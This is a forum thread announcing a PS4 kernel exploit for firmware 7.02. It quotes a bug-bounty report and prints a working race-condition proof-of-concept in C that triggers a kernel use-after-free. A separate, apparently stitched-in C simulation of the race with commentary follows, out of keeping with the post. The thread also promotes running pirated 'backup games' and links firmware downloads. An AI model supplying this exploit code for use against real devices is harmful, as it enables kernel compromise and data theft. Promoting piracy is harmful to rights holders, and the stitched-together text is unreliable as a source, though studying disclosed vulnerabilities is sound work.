Category: PS4 Jailbreaking | Thread starter: PSXHAX | Start date: Jul 6, 2020 at 4:49 PM | 187,324 | 438
As promised last month, PlayStation 4 scene developer theflow0 has dropped the PS4 Kernel Exploit (KEX) for Firmware 7.02 and below. Sony patched it in PS4 OFW 7.50 (the current OFW is 7.51). It can be chained with a WebKit exploit such as the previously released userland PS4 6.XX WebKit Exploit by Fire30_, which works up to PS4 Firmware 6.72 according to theflow0, and Mira support for 6.72 has been added as well! 😻
This means that although today's PS4 kernel exploit works up to Firmware 7.02, the only publicly available PS4 userland exploit currently goes up to 6.72!

Scene developer @Al Azif suggests on Twitter that nobody should update until the full PS4 jailbreak is released, but for those who can't wait, @DEFAULTDNB advises on Twitter NOT to update past 6.72 until a WebKit exploit supporting 7.02 surfaces!

theflow0 thanks diwidog, flat_z, SpecterDev and PlayStation for the collaboration. Not all PlayStation scene developers may agree with how the disclosure was handled through Sony's PlayStation Bug Bounty Program, but to others it is a win-win: theflow0 received a $10k cash bounty for his report, and the PS4 scene gets today's public disclosure, which those who haven't updated can enjoy while a full jailbreak arrives! 💞

Those who'd like to show their appreciation and donate to theflow0 can do so the following ways:
  • via bitcoin 361jRJtjppd2iyaAhBGjf9GUCWnunxtZ49
  • via PayPal
  • via Patreon
To quote from the report on HackerOne.com, titled "Use-After-Free In IPV6_2292PKTOPTIONS leading To Arbitrary Kernel R/W Primitives":

Summary

Due to missing locks in option IPV6_2292PKTOPTIONS of setsockopt, it is possible to race and free the struct ip6_pktopts buffer while it is being handled by ip6_setpktopt. This structure contains pointers (ip6po_pktinfo) that can be hijacked to obtain arbitrary kernel R/W primitives.

As a consequence, it is easy to get kernel code execution. This vulnerability is reachable from the WebKit sandbox and is present in the latest FW, 7.02.

Attachment

Attached is a Proof-Of-Concept that achieves a Local Privilege Escalation on FreeBSD 9 and FreeBSD 12.

Impact
  • In conjunction with a WebKit exploit, a fully chained remote attack can be achieved.
  • It is possible to steal/manipulate user data.
  • Dump and run backup games.
Code:
/*
 * Race condition in ip6_ctloutput where in6p is not locked when calling
 * ip6_pcbopts, which allows for a use after free on in6p->in6p_outputopts
 *
 * Build: gcc -std=c99 -o poc poc.c -lpthread
 * Run: ./poc
 *
 * Discovered by TJ Corley 8/15/2018
 */

#include <netinet/in.h>
#include <pthread.h>
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>

/* FreeBSD's value for the RFC 2292 option; defined here in case the headers omit it */
#ifndef IPV6_2292PKTOPTIONS
#define IPV6_2292PKTOPTIONS 25
#endif

int s;  /* the IPv6 UDP socket both threads hammer */

/* Thread 1: keep installing a valid option set (a single IPV6_TCLASS cmsg),
 * so the kernel keeps allocating and filling an ip6_pktopts for the socket. */
static void *spam_valid(void *unused)
{
    (void)unused;
    char ctrl[CMSG_SPACE(sizeof(int))];

    struct cmsghdr *cmsg = (struct cmsghdr *)ctrl;
    cmsg->cmsg_len = CMSG_LEN(sizeof(int));
    cmsg->cmsg_level = IPPROTO_IPV6;
    cmsg->cmsg_type = IPV6_TCLASS;
    *(int *)CMSG_DATA(cmsg) = 0x4;

    printf("spamming valid IPV6_2292PKTOPTIONS\n");
    for (;;) {
        setsockopt(s, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, cmsg, CMSG_LEN(sizeof(int)));
    }
    return NULL;
}

/* Thread 2: keep passing a zero-length option set, which makes the kernel
 * free the socket's current ip6_pktopts. Racing against thread 1, the free
 * can land while the other call is still using the buffer. */
static void *spam_zero_size_mbuf(void *unused)
{
    (void)unused;
    char buf[4] = {0};
    printf("spamming zero size mbuf\n");
    for (;;) {
        setsockopt(s, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, buf, 0);
    }
    return NULL;
}

int main(void)
{
    pthread_t t;
    s = socket(AF_INET6, SOCK_DGRAM, 0);
    if (s < 0) {
        perror("socket");
        return 1;
    }
    if (pthread_create(&t, NULL, spam_valid, NULL) != 0) {
        perror("pthread_create");
        return 1;
    }
    spam_zero_size_mbuf(NULL);
    return 0;
}
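The PoC above only spins two threads and waits for the kernel to lose the race; it does not show which interleaving it is waiting for. The following is an added user-space model (not code from the report, the PoC or FreeBSD) that replays the setsockopt path as the three steps the PoC's header comment implies: load the socket's options pointer, clear or allocate it and null the slot, then either free it (zero-length input) or fill it and store it back. A schedule picks which call runs each step, so the exact interleaving can be reproduced and the same schedule can be run with and without the PCB lock the vulnerable path omits. The struct and function names (pktopts_model, pcb_model, call_model, run_schedule, last_run_left_dangling) and the two schedules are invented for the example, and the real kernel's mbuf handling, allocator and lock are simplified away.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>

/* Model of struct ip6_pktopts: the fields the report and PoC touch, plus a
 * flag standing in for the allocator so a use-after-free is counted rather
 * than corrupting the heap. Invented names; model only. */
struct pktopts_model {
    int   ip6po_tclass;    /* set by the PoC's IPV6_TCLASS cmsg */
    void *ip6po_pktinfo;   /* the pointer the report says gets hijacked */
    bool  freed;
};

/* Model of the socket's in6p_outputopts slot and the PCB lock. */
struct pcb_model {
    struct pktopts_model *in6p_outputopts;
    int lock_owner;        /* -1 when unlocked */
};

/* One in-flight setsockopt(IPV6_2292PKTOPTIONS) call, split at the points
 * where the kernel may be preempted:
 *   step 0: opt = *pktopt
 *   step 1: clear opt (or allocate one); *pktopt = NULL
 *   step 2: optlen == 0 ? free(opt) : fill opt; *pktopt = opt          */
struct call_model {
    int id;
    bool zero_size;
    int step;              /* 3 means finished */
    struct pktopts_model *opt;
};

static int uaf_count;
static bool last_dangling;
static struct pktopts_model *allocs[4];
static int nallocs;

static struct pktopts_model *alloc_opts(void)
{
    struct pktopts_model *o = calloc(1, sizeof *o);
    if (!o) { perror("calloc"); exit(1); }
    allocs[nallocs++] = o;
    return o;
}

/* Every access to an options object goes through here. */
static void touch(struct pktopts_model *o) { if (o->freed) uaf_count++; }

/* Run one step of a call. Returns false when the call is finished or, in
 * the locked variant, blocked on the lock held by the other call. */
static bool advance(struct pcb_model *pcb, struct call_model *c, bool locked)
{
    if (c->step == 3) return false;
    if (locked) {
        if (pcb->lock_owner != -1 && pcb->lock_owner != c->id) return false;
        pcb->lock_owner = c->id;                  /* take the PCB lock at entry */
    }
    switch (c->step) {
    case 0:
        c->opt = pcb->in6p_outputopts;
        break;
    case 1:
        if (c->opt) { touch(c->opt); c->opt->ip6po_pktinfo = NULL; } /* clear old options */
        else        { c->opt = alloc_opts(); }
        pcb->in6p_outputopts = NULL;
        break;
    case 2:
        touch(c->opt);
        if (c->zero_size) {
            c->opt->freed = true;                 /* free(opt); slot stays NULL */
        } else {
            c->opt->ip6po_tclass = 4;             /* value from the PoC's cmsg */
            pcb->in6p_outputopts = c->opt;        /* *pktopt = opt */
        }
        if (locked) pcb->lock_owner = -1;         /* release at exit */
        break;
    }
    c->step++;
    return true;
}

/* Schedule entries: 0 = the PoC's valid-option call, 1 = its zero-length
 * call. Returns the number of accesses to freed memory. */
int run_schedule(bool locked, const int *sched, size_t n)
{
    struct pcb_model pcb = { .in6p_outputopts = NULL, .lock_owner = -1 };
    struct call_model calls[2] = {
        { .id = 0, .zero_size = false, .step = 0, .opt = NULL },
        { .id = 1, .zero_size = true,  .step = 0, .opt = NULL },
    };
    uaf_count = 0;
    nallocs = 0;
    pcb.in6p_outputopts = alloc_opts();           /* options left by an earlier call */
    for (size_t i = 0; i < n; i++)
        advance(&pcb, &calls[sched[i] & 1], locked);
    while (advance(&pcb, &calls[0], locked) || advance(&pcb, &calls[1], locked))
        ;                                         /* let in-flight calls finish */
    last_dangling = pcb.in6p_outputopts && pcb.in6p_outputopts->freed;
    for (int i = 0; i < nallocs; i++) free(allocs[i]);
    return uaf_count;
}

/* True if the last run left the socket pointing at freed options. */
bool last_run_left_dangling(void) { return last_dangling; }

/* Constructed schedules: both calls load the same opt before either clears
 * the slot, the zero-length call frees it, the valid call keeps using it. */
static const int race_schedule[]   = { 0, 1, 1, 1, 0, 0 };
static const int serial_schedule[] = { 0, 0, 0, 1, 1, 1 };
#define SCHED_LEN 6

static void report(const char *label, bool locked, const int *sched)
{
    int uaf = run_schedule(locked, sched, SCHED_LEN);
    printf("%-18s %d freed-memory accesses, socket dangling: %s\n",
           label, uaf, last_run_left_dangling() ? "yes" : "no");
}

int main(void)
{
    report("unlocked, racing:", false, race_schedule);
    report("locked, racing:", true, race_schedule);
    report("unlocked, serial:", false, serial_schedule);
    return 0;
}
```

Without the lock, the racing schedule gives two accesses to freed memory and leaves in6p_outputopts pointing at the freed buffer, which is the state the report describes: whatever next lands in that chunk is read back as ip6_pktopts, including ip6po_pktinfo. With the lock, the zero-length call cannot run between the valid call's load and its stores, so the same schedule degenerates to the serial one.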
Download: PS4UPDATE.pup (995.5 MB - PS4 6.72 Recovery PUP - MD5: 8140fdd70c1061c379f08566be022ecb) / Mirror / Mirror #2 / Mirror #3 / Mirror #4 via EuropaPeixe
Download: PS4UPDATE.pup (442.4 MB - PS4 6.72 Update PUP - MD5: f3a31f64d894dc06040498cd7383bec2) / Mirror / Mirror #2 / Mirror #3 / Mirror #4 via EuropaPeixe
Cheers to @jwooh for the heads-up on the exploit news, and with Discord help for PSXHAX Member Verifications to access the private area for the latest PS4 PKG games! 🍻

Comments

vishay

I am also thinking the same thing. Like moddedwarfare said, not all devs were happy with the flow. So they will try everything to delay it. Suddenly, in such a covid crisis, specter must go on a vacation for 2 months lol


pop0989

Really excited to be able to update from 5.05; just sad that people weren't patient enough when theFl0w first mentioned that he would release it and harassed him about it.


finalman

@pop0989 Back in March 2020 theflow0 said to stay on 6.20 for the exploit. One or two of my PS4s were above that, so I updated. Then out of nowhere a few days ago he releases a 7.02 kernel exploit.

Wish he would have given an update that his exploit now included 7.02; guessing it cost others the chance as well.

No big deal for me though, because I've got 3 other already-JB'd Pros.

I also mentioned above the 7.02 coming out of nowhere, when theflow was saying he had a 6.20 exploit months earlier and theflow0 said he accepted the 10k bounty from Sony.

It turns out this exploit was published to the FreeBSD community two days earlier than theflow0's quoted Sony handover date.

Makes us wonder if theflow0 saw the exploit published by someone else and went straight to Sony to claim the bounty.
